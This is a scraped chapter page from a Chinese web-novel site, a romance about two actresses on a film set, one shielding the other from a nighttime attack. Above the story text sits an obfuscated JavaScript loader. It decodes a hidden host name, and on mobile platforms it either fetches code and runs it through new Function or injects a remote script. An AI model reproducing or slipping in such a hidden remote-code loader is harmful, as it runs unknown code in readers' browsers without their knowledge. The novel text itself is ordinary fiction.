98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一页
目录 | 设置
下一章

分卷(37(2 / 2)

加入书签 | 推荐本书 | 问题反馈 |

这个态度上的细微转变已足够让孟璟心花怒放了,今天就先到这里,火力全开的话,又要把小药瓶子刚松开一点点的瓶盖儿给吓得紧回去。

她这天是乖乖地回到自己房间去的。

次日的拍摄,倪俊对两个人大加赞赏,昨晚做了什么?卓有成效啊。

孟璟笑嘻嘻地揽过未婚妻的肩,做了一点不能说的秘密。

倪俊咳嗽一声,他知道二世祖来这里一定是有目的的,也不加以戳穿,只说今天会有一些观光团来参观,你们好好表现。

观光团,横店一种神奇的存在,或是怀有影视梦的小雏鸟,或是来采风的小写手,或是对娱乐圈好奇的吃瓜群众,都会在开放日进入这个星光璀璨的影视城,围观剧组拍戏。

白天的戏是郑遂心和景知安在校园相遇。

倪俊依然十分注重镜头质感。

剧情开始以前,景知安的特写就走了将近一小时,记录她对周遭一切那种半明半昧的态度。她似乎很在意,又似乎不在意。同学对她的搭讪,她总带着点心不在焉,仿佛挂怀着别的事,但是也用清淡的笑颜以对。讲台上老师说,有新同学转学来班上,景知安依旧低垂着睫毛在写自己的作业。直至其他同学发出哗然的声响,她才抬起头来,讲台上的女生头发挑染了几缕殷红,即使是老师正在讲话,她仍旧片刻不停地嚼着嘴里的口香糖,唇角勾勒着一抹嘲讽的浅笑。

景知安抬头。郑遂心与她视线相遇时,眼睛里的笑意有一瞬间的凝固,但是转瞬更为恣意飞扬。讲台下方被她注视的女生却陡然浑身一僵,尽管她很沉静,可她掩饰得不太好,还是让人看出来了。这个反应让郑遂心越发神采奕奕。

接着又是一长段的景知安特写。她脸上的强自镇定和惶惶不安交替出现。对于一个只见过寥寥数面的人这样过分在意,是不合情理的,因此她又难免困惑。

宋若拍这一组镜头的时候,孟璟在旁边,心满意足地看着自己的小小未婚妻。原来她的表情可以这么生动呀。

几米开外有观光团,都很矜持,孟璟的视线原本是轻轻扫过那些人,在遇到一张似曾相识的面孔时,忽然顿住。怎么会是她?吕清義身后站着几个小喽啰,她的目光带着说不明的情绪,凝视着正拍摄的宋若。和孟璟视线一对上,吕清義征了征,立刻没入了人群中,消失不见。

是偶然的吧。

孟璟心里有点嘀咕。

晚上补拍昨日晚上的戏份,时间线上,在白昼的戏份之前。

郑遂心替精品店偶遇的女生付了款,郑母问那是谁,郑遂心说是同学,郑母同景知安点了个头,便走开了去开车,将两个人单独留在路边。景知安不肯接受陌生人的馈赠。郑遂心又点了一支烟,穿着白衣蓝裙的她,卸掉了大浓妆,甚至绑了双马尾,一派清纯,这样的她,叼着烟要多违和有多违和,她仍旧是那副吊儿郎当的态度,朝景知安吐了一溜烟圈为什么不收?

无功不受禄。

那你让老子亲一口。就算扯平了。郑遂心完全是一副混混态度。

景知安脸上颜彩变幻,转身要走。

郑遂心切了一声,将东西强行塞给她,一脸的无所谓,先欠着呗,以后再还。说完就离开了。

这个场景让宋若想到最初孟璟给她银行卡的时候。

说起来孟璟比郑遂心还要懂礼貌一点,毕竟没爆粗口。

今天苏小健回家看父母,苏小康提前去煲营养汤。收工时,孟璟蹭蹭未婚妻的肩,哎,老婆,好像有点开心?

宋若摸了摸自己的脸,不动声色恢复了淡定,收工了,当然开心。

我请老婆吃宵夜吧。孟璟顺其自然地接口。

不敢。宋若很认真地说。

这有什么不敢的。孟璟失笑。她很开心,未婚妻终于能同她做这样轻松的交流了,不再是说教。比如那天刚挂掉电话的小药瓶子,她简直像个教导主任孟璟,你要是把这里当成逃避学校的游乐场,巴拉巴拉巴拉,老气横秋的。

不敢。多么可爱。

也许真的是因为工作顺利,宋若看看笑容温软的抹香鲸,在这柔嫩的夜色里,她的心情也变得清爽起来,抿着嘴笑了笑我怕胖。跟组的时候不敢放肆。不然全组停工等着我减肥,太不好意思了。

孟璟恍然大悟似的哦一声我老婆真棒

这个棒字还没落地,忽然眼角一晃,有个明晃晃的东西挥过来,眼见就要打到宋若背上,孟璟说时迟那时快地将宋若一拉,用身体挡住了她。

宋若还没明白过来发生什么,只听见孟璟轻哼了一声,同时有钝器捶在身体上的笨重声响。有人轻轻啊了一声,紧接着响起仓皇离去的脚步声。

宋若被抹香鲸紧紧搂在怀里,喊了一声孟璟。

嗯。孟璟低低答应了。

你还好吗。宋若一动不敢动。那天下午七中食堂爆炸事故之后,她其实有想过,孟璟的生命安全是不用担心的,因为她是小说女主,女主不会死。她只怕她这个变量导致一些其他的损伤,那她也对不起孟爷爷。现在这种感觉又出现了。她轻轻摸摸搂着自己的那条手臂,放开我,我看看你。

孟璟还抱了她大概一分钟左右,松开了。

宋若转过脸,看到的是抹香鲸的笑脸,她乌润的瞳孔在黑夜里十分闪耀,像两颗黑宝石。这段处在两个路灯中间,轻柔的橘色灯光从两边照过来,将两个人裹在淡淡的光雾中。秋初的天气依旧十分热,地表蒸腾出源源不断的热汽,轻抚在光裸的小腿上。宋若没说话,只歪头看着眼前高一头的女孩子。

看什么看,没见过美女啊。孟璟知道自己的笑肯定有点勉强,只恨自己演技不够。

未婚妻果然上来扶住她的肩,要帮她掉转身的意思,嘴里轻声说我看看。

孟璟不让,她的力气更大。

两个人在距离酒店几十米的地方拉扯了一会儿。

宋若虽然没看到伤处,但知道这一棍子肯定伤到她了,因为每扯动一下,孟璟脸上的表情就多几分勉强。坚持了一会儿,见远处有人朝她们这边行注目礼了,只微微叹息一声,那回房间看吧,我给你擦药。

未婚妻主动提出这么诱人的服务,孟璟本来应该乐开花才对,她洗完澡出来,宋若甚至不用她撒娇卖萌,自主自发就过来了,站在门口拿着昨天放在她那里的那盒药油,抿着嘴没有说话。

让我看一下。

不用啦老婆,没什么事。

门一关上,两个人的对白又成了鸡生蛋蛋生鸡,循环了十来遍。

最后还是孟璟邪邪一笑改变了话题难道是老婆想趁机看我身材?看了娶我吗。

宋若我看看严不严重,严重的话要看医生。

孟璟却两手插兜在原地蹦了几蹦,嘶了一声我这不挺好。

你让我看看。

这次小药瓶子是命令的语气了!

孟璟觉得好带感啊,未婚妻心里还是在乎自己的,她从后边扶着她的肩,凑在她耳边轻声解释我从小就在外面打架,大大小小没有三百架也有二百五,这种不法分子半夜道上偷袭,简直小菜一碟,我没事的,你坚持要看我,显得我太金贵了,以后我可就赖上你了啊,一点点小病小痛就哭着喊着要老婆亲亲老婆抱抱,看你到时候怎么办

上一页
目录
下一章
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间